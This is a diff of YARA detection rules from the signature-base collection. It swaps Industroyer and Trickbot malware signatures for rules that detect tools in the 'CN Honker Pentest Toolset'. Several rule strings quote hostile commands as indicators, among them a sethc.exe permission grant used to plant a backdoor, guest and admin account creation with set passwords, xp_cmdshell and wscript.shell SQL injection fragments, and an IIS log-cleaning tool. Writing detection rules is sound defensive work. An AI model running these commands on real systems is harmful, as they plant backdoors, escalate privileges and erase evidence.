-		$s3 = "AdjustTokenPrivileges() error: 0x%08X" fullword ascii
-		$s4 = "\\SAM-%u.dmp" ascii
+		$s0 = "YuJianScan.exe" fullword wide
+		$s1 = "YuJianScan" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 225KB and all of them
 }
-rule SIGNATURE_BASE_Industroyer_Malware_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Hconstfportable : FILE
 {
 	meta:
-		description = "Detects Industroyer related malware"
+		description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f5ab571c-03a7-538a-ada1-0930d15af5cf"
-		date = "2017-06-13"
+		id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L12-L37"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1502-L1517"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "276b7abdf43b62c3943a8dc362e1c68b23cc505d288e4395a6ac3cb4795371f2"
-		score = 75
+		hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
+		logic_hash = "d4368994d38b87a4c0a53321a468fa8a72411ccb17befa0bbc62bdd6de9e1a52"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910"
-		hash2 = "018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81"
 
 	strings:
-		$s1 = "haslo.exe" fullword ascii
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\%ls" fullword wide
-		$s3 = "SYS_BASCON.COM" fullword wide
-		$s4 = "*.pcmt" fullword wide
-		$s5 = "*.pcmi" fullword wide
-		$x1 = { 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73
-         00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61
-         00 67 00 65 00 50 00 61 00 74 00 68 00 00 00 43
-         00 3A 00 5C 00 00 00 44 00 3A 00 5C 00 00 00 45
-         00 3A 00 5C 00 00 00 }
-		$x2 = "haslo.dat\x00Crash"
+		$s1 = "HconSTFportable.exe" fullword wide
+		$s2 = "www.Hcon.in" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 354KB and all of them
 }
-rule SIGNATURE_BASE_Industroyer_Malware_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V3_LPK : FILE
 {
 	meta:
-		description = "Detects Industroyer related malware"
+		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0561a7bb-3b6c-5caf-9131-04924cee1e0f"
-		date = "2017-06-13"
+		id = "c5b806d9-74dc-5244-b1e0-9837abeaeaac"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L39-L77"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1519-L1536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cda3e21c130acd76785905364416b3e8803e866dd93529da57ec980e7af081b7"
-		score = 75
-		quality = 83
+		hash = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
+		logic_hash = "20e949bef1c1631ef2a48c78c2ccc4dcea2f842275ec5df3e31c5d915e8a2a04"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571"
-		hash2 = "37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4"
-		hash3 = "ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77"
-		hash1 = "6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47"
 
 	strings:
-		$x1 = "sc create %ls type= own start= auto error= ignore binpath= \"%ls\" displayname= \"%ls\"" fullword wide
-		$x2 = "10.15.1.69:3128" fullword wide
-		$s1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" fullword wide
-		$s2 = "/c sc stop %s" fullword wide
-		$s3 = "sc start %ls" fullword wide
-		$s4 = "93.115.27.57" fullword wide
-		$s5 = "5.39.218.152" fullword wide
-		$s6 = "tierexe" fullword wide
-		$s7 = "comsys" fullword wide
-		$s8 = "195.16.88.6" fullword wide
-		$s9 = "TieringService" fullword wide
-		$a1 = "TEMP\x00\x00DEF" fullword wide
-		$a2 = "TEMP\x00\x00DEF-C" fullword wide
-		$a3 = "TEMP\x00\x00DEF-WS" fullword wide
-		$a4 = "TEMP\x00\x00DEF-EP" fullword wide
-		$a5 = "TEMP\x00\x00DC-2-TEMP" fullword wide
-		$a6 = "TEMP\x00\x00DC-2" fullword wide
-		$a7 = "TEMP\x00\x00CES-McA-TEMP" fullword wide
-		$a8 = "TEMP\x00\x00SRV_WSUS" fullword wide
-		$a9 = "TEMP\x00\x00SRV_DC-2" fullword wide
-		$a10 = "TEMP\x00\x00SCE-WSUS01" fullword wide
+		$s1 = "FreeHostKillexe.exe" fullword ascii
+		$s2 = "\\sethc.exe /G everyone:F" ascii
+		$s3 = "c:\\1.exe" fullword ascii
+		$s4 = "Set user Group Error! Username:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 3 of them or 1 of ( $a* ) ) or ( 5 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Industroyer_Portscan_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Without_A_Trace_Wywz : FILE
 {
 	meta:
-		description = "Detects Industroyer related custom port scaner"
+		description = "Sample from CN Honker Pentest Toolset - file Wywz.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f6675466-d469-562b-9fb6-7b72bce8a726"
-		date = "2017-06-13"
+		id = "1093c0c3-499f-5aec-ad4a-878d377296d5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L79-L100"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1538-L1554"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "539a420989c178b3fa26e313d23e9f9c6804aa6dbd2d94f463ae924d46ac2851"
-		score = 75
+		hash = "f443c43fde643228ee95def5c8ed3171f16daad8"
+		logic_hash = "0f6ca7d44312afef49d3094af7b33af5e41f4531e7e7f9f37cf050700755bb3e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f"
 
 	strings:
-		$s1 = "!ZBfamily" fullword ascii
-		$s2 = ":g/outddomo;" fullword ascii
-		$s3 = "GHIJKLMNOTST" fullword ascii
-		$d1 = "Error params Arguments!!!" fullword wide
-		$d2 = "^(.+?.exe).*\\s+-ip\\s*=\\s*(.+)\\s+-ports\\s*=\\s*(.+)$" fullword wide
-		$d3 = "Exhample:App.exe -ip= 127.0.0.1-100," fullword wide
-		$d4 = "Error IP Range %ls - %ls" fullword wide
-		$d5 = "Can't closesocket." fullword wide
+		$s1 = "\\Symantec\\Norton Personal Firewall\\Log\\Content.log" ascii
+		$s2 = "UpdateFile=d:\\tool\\config.ini,Option\\\\proxyIp=127.0.0.1\\r\\nproxyPort=808" ascii
+		$s3 = "%s\\subinacl.exe /subkeyreg \"%s\" /Grant=%s=f /Grant=everyone=f" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) or 2 of ( $d* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1800KB and all of them
 }
-rule SIGNATURE_BASE_Industroyer_Portscan_3_Output
+rule SIGNATURE_BASE_CN_Honker_LPK2_0_LPK : FILE
 {
 	meta:
-		description = "Detects Industroyer related custom port scaner output file"
+		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4469f056-674c-5a44-84a5-12a65b8586d5"
-		date = "2017-06-13"
+		id = "4aa40b78-5fe4-5312-881c-e5a292435ff0"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L102-L115"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1556-L1573"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6a2fc7b66b1e93f523e08e12ba420d261bae198918bb09eac1a7cdecc04a6737"
-		score = 75
+		hash = "5a1226e73daba516c889328f295e728f07fdf1c3"
+		logic_hash = "d693b880d5419277d9189d44ace60fe5f328b4662c1975a8bc97e63dc073d1e6"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "WSA library load complite." fullword ascii
-		$s2 = "Connection refused" fullword ascii
+		$s1 = "\\sethc.exe /G everyone:F" ascii
+		$s2 = "net1 user guest guest123!@#" fullword ascii
+		$s3 = "\\dllcache\\sethc.exe" ascii
+		$s4 = "sathc.exe 211" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1030KB and all of them
 }
-rule SIGNATURE_BASE_Industroyer_Malware_4 : FILE
+rule SIGNATURE_BASE_CN_Honker_Cleaniis : FILE
 {
 	meta:
-		description = "Detects Industroyer related malware"
+		description = "Sample from CN Honker Pentest Toolset - file cleaniis.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f197d2a5-eecb-51ed-b991-7643efb3f749"
-		date = "2017-06-13"
+		id = "75f3c33a-e3b8-57bc-a3fd-f8b6491388d8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L117-L134"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1575-L1590"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb850445eaf3e1a6c9a9d6c453ed0f6729a95a671a01ce8fbaddf15599e4f2ba"
-		score = 75
+		hash = "372bc64c842f6ff0d9a1aa2a2a44659d8b88cb40"
+		logic_hash = "6f3fe22c9ce8b576116a3fc185910488f37b687c1158d49a93feaa68a144a8db"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561"
 
 	strings:
-		$s1 = "haslo.dat" fullword wide
-		$s2 = "defragsvc" fullword ascii
-		$a1 = { 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00 }
+		$s1 = "iisantidote <logfile dir> <ip or string to hide>" fullword ascii
+		$s4 = "IIS log file cleaner by Scurt" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or $a1 )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Industroyer_Malware_5 : FILE
+rule SIGNATURE_BASE_CN_Honker_Arp3_7_Arp3_7 : FILE
 {
 	meta:
-		description = "Detects Industroyer related malware"
+		description = "Sample from CN Honker Pentest Toolset - file arp3.7.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52ce21a0-0c72-585c-a805-c5077a7445af"
-		date = "2017-06-13"
+		id = "a4aeefaf-a097-5ba3-a18f-54a1b9752883"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/x81cSy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L136-L158"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1592-L1607"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9dfd3cfc724f0dfe090b1bcbf03b9ebd0d01b3d781f833a8ca6ba1451a63d5ad"
-		score = 75
+		hash = "db641a9dfec103b98548ac7f6ca474715040f25c"
+		logic_hash = "9930d5f13c4dc5cae25dece811911e71e858e3fef51a09c99883699e7feb4908"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad"
 
 	strings:
-		$x1 = "D2MultiCommService.exe" fullword ascii
-		$x2 = "Crash104.dll" fullword ascii
-		$x3 = "iec104.log" fullword ascii
-		$x4 = "IEC-104 client: ip=%s; port=%s; ASDU=%u " fullword ascii
-		$s1 = "Error while getaddrinfo executing: %d" fullword ascii
-		$s2 = "return info-Remote command" fullword ascii
-		$s3 = "Error killing process ..." fullword ascii
-		$s4 = "stop_comm_service_name" fullword ascii
-		$s5 = "*1* Data exchange: Send: %d (%s)" fullword ascii
+		$s1 = "CnCerT.Net.SKiller.exe" fullword wide
+		$s2 = "www.80sec.com" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Exp_Ms11080 : FILE
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Sample from CN Honker Pentest Toolset - file ms11080.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b428cbf9-0796-5a01-9b98-28e1bc6827cc"
-		date = "2019-10-02"
+		id = "2f5ce2f3-3595-5729-be0c-3f6486cb94fd"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L3-L22"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1609-L1624"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fef15c0bda6dc2b28f34791da3ca68a03f7368b63ead17e631a2d4f05d1b40e2"
-		score = 75
+		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
+		logic_hash = "57eb1cdd1108c82da399b0aa869edc9e377e0185896504716bec8925599c07f0"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
-		hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
-		hash3 = "9d6e4ad7f84d025bbe9f95e74542e7d9f79e054f6dcd7b37296f01e7edd2abae"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Celestor@hotmail.com" fullword ascii
-		$s2 = "\\txtPassword" ascii
-		$s14 = "Invalid Password, try again!" fullword wide
-		$op1 = { 78 c4 40 00 ff ff ff ff b4 47 41 }
-		$op2 = { 9b 68 b2 34 46 00 eb 14 8d 55 e4 8d 45 e8 52 50 }
+		$s2 = "[*] command add user 90sec 90sec" fullword ascii
+		$s6 = "[*] Add to Administrators success" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 840KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Injection_Transit : FILE
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2ff69a51-d089-53e5-ab19-4fbdf20f90f8"
-		date = "2019-10-02"
+		id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L24-L38"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1626-L1642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "185e59c156218b418bec0c94144b19639c17e3a9595d993e3761eae15379f9fb"
-		score = 75
+		hash = "f4fef2e3d310494a3c3962a49c7c5a9ea072b2ea"
+		logic_hash = "3e6fe804b9b6e8555c847a165bb0a8b266004653531fe8f11e3937108757f2ff"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
-		hash2 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "C:\\Users\\User\\Desktop\\Encrypt\\Math_Cad\\Release\\Math_Cad.pdb" fullword ascii
-		$x2 = "AxedWV3OVTFfnGb" fullword ascii
+		$s0 = "<description>Your app description here</description> " fullword ascii
+		$s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide
+		$s5 = "ScriptnackgBun" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3175KB and all of them
 }
-
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Safe3Wvs : FILE
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Sample from CN Honker Pentest Toolset - file Safe3WVS.EXE"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3428b7e3-def9-5574-bbbb-6ba98c134dec"
-		date = "2019-10-02"
+		id = "035ecb73-3dbc-55d2-8d0c-b71308094d18"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L40-L56"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1644-L1662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87860212077b63bf3e4835a3a64b934fc7edd3258355a3e94a69acaba39c2516"
-		score = 75
+		hash = "fee3acacc763dc55df1373709a666d94c9364a7f"
+		logic_hash = "803591fa9427c3001f78ae6274076f3a2f070770d568909d6cba8cee5124ee4c"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
-		hash2 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
-		hash3 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
-		hash4 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
-		hash5 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Decrypt Shell Fail" fullword ascii
+		$s0 = "2TerminateProcess" fullword ascii
+		$s1 = "mscoreei.dll" fullword ascii
+		$s7 = "SafeVS.exe" fullword wide
+		$s8 = "www.safe3.com.cn" fullword wide
+		$s20 = "SOFTWARE\\Classes\\Interface\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of them or pe.imphash ( ) == "4e3fbfbf1fc23f646cd40a6fe09385a7" )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_4 : FILE
+rule SIGNATURE_BASE_CN_Honker_NBSI_3_0 : FILE
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Sample from CN Honker Pentest Toolset - file NBSI 3.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcadaa50-52ae-5ded-b40e-149f28092093"
-		date = "2019-10-02"
+		id = "be8d0dce-4f7f-5f18-9ed0-99fc1dc2b22f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L58-L77"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1664-L1681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c109510d86260b4173bbbac5fe69936acb109e7fdbe71fbe2955e5ed85f5cd85"
-		score = 75
-		quality = 85
+		hash = "93bf0f64bec926e9aa2caf4c28df9af27ec0e104"
+		logic_hash = "017b5f76a3168089f3186134e7a4c0352158bb866228776240f0d014834e6ee0"
+		score = 70
+		quality = 60
 		tags = "FILE"
-		hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
-		hash2 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
-		hash3 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
-		hash4 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "c:\\users\\user\\documents\\visual studio 2005\\projects\\adzxser\\release\\ADZXSER.pdb" fullword ascii
-		$x2 = "http://root-hack.org" fullword ascii
-		$x3 = "http://hax-studios.net" fullword ascii
-		$x4 = "5OCFBBKCAZxWUE#$_SVRR[SQJ" fullword ascii
-		$x5 = "G*\\AC:\\Users\\911\\Desktop\\cButtonBar\\cButtonBar\\ButtonBar.vbp" fullword wide
+		$s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
+		$s2 = "http://localhost/1.asp?id=16" fullword ascii
+		$s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide
+		$s4 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2600KB and 2 of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_5 : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_Dubrute_V3_0_RC3_2_0 : FILE
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Sample from CN Honker Pentest Toolset - file 2.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b3034f0c-5fd9-58a2-866f-9100e3a56f39"
-		date = "2019-10-02"
+		id = "dda5eea9-da79-5f1f-bbac-9f05ba7e71c9"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L79-L96"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1683-L1699"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e304b236dd58faa0e6fdd73bc93c24f6ff0ec6c1f9a54b104f8e87441834e22b"
-		score = 75
+		hash = "e8ee982421ccff96121ffd24a3d84e3079f3750f"
+		logic_hash = "8c9be7e8cc04eba6b131acc3c85ac48d7663260a2e4064ad55ed8f40e0875cf4"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
-		hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
-		hash3 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
-		hash4 = "9d6e4ad7f84d025bbe9f95e74542e7d9f79e054f6dcd7b37296f01e7edd2abae"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "LoadShellCode" fullword ascii
-		$s2 = "pShellCode" fullword ascii
-		$s3 = "InitShellCode" fullword ascii
+		$s0 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii
+		$s3 = "Create %d IP@Loginl;Password" fullword ascii
+		$s15 = "UBrute.com" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 980KB and 2 of them
 }
-rule SIGNATURE_BASE_MAL_Trickbot_Oct19_6 : FILE
+rule SIGNATURE_BASE_CN_Honker_Hkmjjiis6 : FILE
 {
 	meta:
-		description = "Detects Trickbot malware"
+		description = "Sample from CN Honker Pentest Toolset - file hkmjjiis6.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5feb8d34-4974-5315-a5f9-79a3fac83d1d"
-		date = "2019-10-02"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L98-L115"
+		id = "badf8224-4f09-57aa-ab16-0d70e0b3f88c"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1701-L1718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "599b1f56483f4ea267595b90dd4ef93b7e2147e4a0d8449cdd9d2539a96c3f79"
-		score = 75
+		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
+		logic_hash = "a087b9731444152b717e0fbae557004d94f3fb69a4ec65aa38b7a3dab3e3cddf"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
-		hash2 = "cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "D:\\MyProjects\\spreader\\Release\\ssExecutor_x86.pdb" fullword ascii
-		$s1 = "%s\\appdata\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\%s" fullword ascii
